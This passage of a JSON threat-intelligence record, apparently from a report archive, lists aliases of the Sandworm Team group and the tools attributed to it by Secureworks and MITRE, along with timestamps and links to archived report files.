				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434071,
	"ts_updated_at": 1775792228,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/783fd5b25678a528a3486a381f3860dec20d8495.pdf",
		"text": "https://archive.orkl.eu/783fd5b25678a528a3486a381f3860dec20d8495.txt",
		"img": "https://archive.orkl.eu/783fd5b25678a528a3486a381f3860dec20d8495.jpg"
	}
}